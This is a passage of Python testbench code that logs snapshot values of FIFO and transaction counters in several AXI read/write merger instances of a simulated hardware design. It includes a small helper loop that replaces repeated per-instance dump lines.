logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge212.axi_wr_4_merger.d_win_fifo.int_count"))
# The block below collapses four identical per-merger snapshot dumps
# (merge213, merge214, merge215, merge3) into a loop. The emitted lines,
# their text, and their order are unchanged from the original
# line-by-line dump; the surrounding partial sections (merge212 above,
# merge4 below) are left as literal dump lines.
def _snp_peek(path):
    # Same format as the surrounding dump lines: "SNP <hex value> <path>".
    logs.log_info("SNP %x %s" % (logs.peek(path), path))

def _snp_merger(base):
    # Dump every counter of one 4-way read/write merger instance.
    rd = base + ".axi_rd_4_merger."
    wr = base + ".axi_wr_4_merger."
    for p in "abcd":
        _snp_peek(rd + p + "_rcount")
    for p in "abcd":
        _snp_peek(rd + p + "_ar_fifo.count")
        _snp_peek(rd + p + "_ar_fifo.int_count")
        _snp_peek(rd + p + "_ids_fifo.next_count")
        _snp_peek(rd + p + "_ids_fifo.count")
    for p in "abcd":
        _snp_peek(wr + "panic_" + p + "count")
    for p in "abcd":
        _snp_peek(wr + p + "_bcount")
    for p in "abcd":
        _snp_peek(wr + p + "_aw_fifo.count")
        _snp_peek(wr + p + "_aw_fifo.int_count")
        _snp_peek(wr + p + "_b_fifo.next_count")
        _snp_peek(wr + p + "_b_fifo.count")
        if p == "b":
            # Only port b of the write merger has an out_fifo.
            _snp_peek(wr + "b_out_fifo.next_count")
            _snp_peek(wr + "b_out_fifo.count")
        _snp_peek(wr + p + "_win_fifo.count")
        _snp_peek(wr + p + "_win_fifo.int_count")

for _base in ("tb.dut.merge213", "tb.dut.merge214", "tb.dut.merge215", "tb.dut.merge3"):
    _snp_merger(_base)
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge4.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge4.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge5.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge5.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge6.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.count"))
